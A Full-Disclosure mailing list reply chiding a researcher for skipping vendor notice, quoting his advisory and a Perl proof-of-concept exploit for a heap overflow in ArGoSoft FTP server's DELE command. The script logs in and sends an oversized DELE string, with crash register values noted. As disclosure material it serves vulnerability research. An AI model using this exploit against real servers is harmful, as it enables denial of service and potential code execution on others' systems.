-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 you forgot to message the programmer of it before the public
/slap on you ;-> Jerome Athias wrote: > -- Title: ArGoSoft FTP server remote heap overflow > > -- Affected Products: ArGoSoft FTP server 1.4.3.5 (current) and > prior > > -- Affected Vendor: ArGoSoft - http://www.argosoft.com > > -- Impact: DoS, Arbitrary Code Execution > > -- Where: >> From remote > > -- Type: Heap Overflow > > -- Vulnerability Details: A remote attacker with valid credentials > is able to trigger a heap overwrite in ArgoSoft FTP server. The bug > occurs by providing a long argument to the DELE command. This > vulnerability can allow remote attackers to execute arbitrary code > or launch a denial of service attack. > > -- Credit: This vulnerability was discovered by Jerome Athias. > https://www.securinfos.info/english/ > > > > > #!/usr/bin/perl > > # ---------------------------------------------------- # # > ArgoSoftFTP.pl - PoC exploit for ArgoSoft FTP Server # # Jerome > Athias # # > ---------------------------------------------------- # > > use Net::FTP; > > # geting data $host = @ARGV[0]; $port = @ARGV[1]; $debug = > @ARGV[2]; $user = @ARGV[3]; $pass = @ARGV[4]; > > # =========== > > if (($host) && ($port)) { > > # make exploit string $exploit_string = "DELE "; $exploit_string .= > "A" x 2041; $exploit_string .= "B" x 4; $exploit_string .= "C" x > 1026; > > # On Win2K SP4 FR: # EAX 42424241 # ECX 43434343 # EDX > 43434342 # EBX 43434B73 > > # =================== > > print "Trying to connect to $host:$port\n"; $sock = > Net::FTP->new("$host",Port => $port, TimeOut => 30, Debug=> $debug) > or die "[-] Connection failed\n"; print "[+] Connect OK!\n"; print > "Logging...\n"; if (!$user) { $user = "test"; $pass = "test"; } > $sock->login($user, $pass); $answer = $sock->message; print > "Sending string...\n"; $sock->quot($exploit_string); } else { print > "ArgoSoft FTP Server - PoC > Exploit\nhttps://www.securinfos.info\n\nUsing: $0 host port > username password [debug: 1 or 0]\n\n"; } > _______________________________________________ Full-Disclosure - > We believe in it. Charter: > http://lists.grok.org.uk/full-disclosure-charter.html Hosted and > sponsored by Secunia - http://secunia.com/ > > > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (MingW32) iQIVAwUBRAC+uK+LRXunxpxfAQK6Gw//U+rWA2lZwtNSF5ZUyXgPP7RaWwiFfdNP pLG3LjxGhj5nVvjbf5MDS3pbTHc09sCMXB/rapH1UJhYwvRva7Bc7Wp83TJrmMgg 8qOrKl269v/3Mv8VBZ3j4arxYVPp+JxEAK6HCNndOvgCKbhiZUVodJh45OWsa4zW b1N85Shxfw7Zv+Jb0vf4eY05lnzu7OgHxPOGsykaWTvtNtlZZMuxorGBUeL1lJmz s924HwIyKQnpZAmzSbXcBACPVBpqHR4WLRU6dyJkekt4lU0F80lsr5+qDsv9IVsA S8phar6sbo+VtaxSTh8Q9tK4NhI3WaYuKh9SRZ6ahniXN/69fqSnJSbDFdSBEQib 12NhjoiHPTSyAv1l2SdccRiRjtik6StMQjkbe9pgf3WGGerzXZuk4ckUFVblSpXR OW9Zrn1W11pPzcwI+laVUTFEmyTdWMh+yU1yQIPliu2G1IbsuBmXYsMj/5vLIDhj rCY/PopBtrI3/np+XN1Pq8mHwUwUeWw01K2kir7QUMNmn32LIA7UUjaACoEukINy eC8hVXoAOOc/ZUmr9Mfs391tdEdnO4ufOamTDwJ7KG/Ngxn54ic+vmIkyl3aUO3Q ZXeSKe1igZ9dEDJWSYhfyj8bgEXQcA4LhLgwCHXC150Ehp4d/1YQo3qIFBDrMt3m KIjI6zWxH10= =bA3R -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
